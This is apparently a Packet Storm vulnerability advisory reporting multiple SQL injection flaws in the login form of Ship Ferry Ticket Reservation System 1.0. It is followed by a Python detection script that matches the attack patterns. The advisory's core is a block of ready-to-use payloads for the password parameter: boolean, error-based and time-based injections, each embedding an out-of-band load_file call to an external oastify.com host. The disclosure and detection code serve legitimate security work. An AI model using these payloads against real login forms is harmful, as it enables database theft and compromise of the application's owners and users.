Ship Ferry Ticket Reservation System 1.0 SQL Injection

Ship Ferry Ticket Reservation System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

Packet Storm
#sql #xss #vulnerability #web #git #php #rce #auth
## Titles: SFTRS - PHP (by: oretnom23) v1.0 Multiple-SQLi
### Bonus: FU + RCE & XSS - Information disclosure
## Author: nu11secur1ty
## Date: 09/14/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14923/shipferry-ticket-reservation-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `password` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+' was submitted in the password parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. An attacker can retrieve all information from this system's database and take highly damaging actions against the owner of this application!

STATUS: HIGH - Vulnerability for deprecation!

WARNING: DON'T USE ANY PRODUCTS FROM THIS VENDOR!
https://github.com/oretnom23

[+]Exploits:
- SQLi Multiple:

```mysql
---
Parameter: password (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') OR NOT 9033=9033 AND ('ehPW'='ehPW

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 4905 FROM(SELECT COUNT(*),CONCAT(0x7171767a71,(SELECT(ELT(4905=4905,1))),0x71706b7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('zzCg'='zzCg

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=iOPjKWgj&password=i8V!p7q!S1'+(select load_file('\\\\wxx3v5fkcqnwh58c574znoqo1f78vyjpmde05ou.oastify.com\\tiq'))+'') AND (SELECT 1493 FROM (SELECT(SLEEP(7)))tpHs) AND ('PbYw'='PbYw
---
```

## Reproduce:
[href](https://www.patreon.com/posts/sftrs-php-by-v1-112034018)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/09/sftrs-php-by-oretnom23-shipferry-ticket.html)

## Time spent:
00:17:00
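
A detection-side companion to the payloads listed above, added here as an example (not code from the advisory or the vendor): it scans URL-encoded login bodies, as a request-inspection hook would see them, for the out-of-band `load_file`, boolean, error-based and time-based patterns the advisory reports. The signature names, `scan_body`, `triage` and the sample bodies are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs

# Signatures modelled on the sqlmap techniques listed in the advisory above.
SIGNATURES = {
    "oob-load_file-unc": re.compile(r"load_file\s*\(\s*['\"]\\{2,}", re.I),
    "time-based-sleep": re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I),
    "error-based-floor-rand": re.compile(r"floor\s*\(\s*rand\s*\(", re.I),
    "boolean-tautology": re.compile(
        r"\b(?:or|and)\s+(?:not\s+)?(\d+)\s*=\s*\1\b", re.I),
}

def scan_body(body, fields=("username", "password")):
    """Return the sorted signature names matched in the watched form fields."""
    params = parse_qs(body, keep_blank_values=True)
    hits = set()
    for field in fields:
        for value in params.get(field, []):  # values arrive URL-decoded
            hits.update(n for n, rx in SIGNATURES.items() if rx.search(value))
    return sorted(hits)

# Constructed sample bodies (not captured traffic); the host is a placeholder.
SAMPLES = [
    "username=alice&password=S3cure%21pass",
    r"username=u&password=x'+(select load_file('\\\\host.example.invalid\\a'))+'",
    "username=u&password=x') AND (SELECT 1 FROM (SELECT(SLEEP(7)))t) AND ('a'='a",
    "username=u&password=x') OR NOT 9033=9033 AND ('a'='a",
]

def triage(samples=SAMPLES):
    """Map each body to its findings; an empty list means nothing matched."""
    return {body: scan_body(body) for body in samples}

if __name__ == "__main__":
    for body, hits in triage().items():
        print(("ALERT " + ",".join(hits)) if hits else "ok", "|", body[:60])
```

Signature matching only flags probes like these; the fix for the injection itself is a parameterized query in the login handler.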
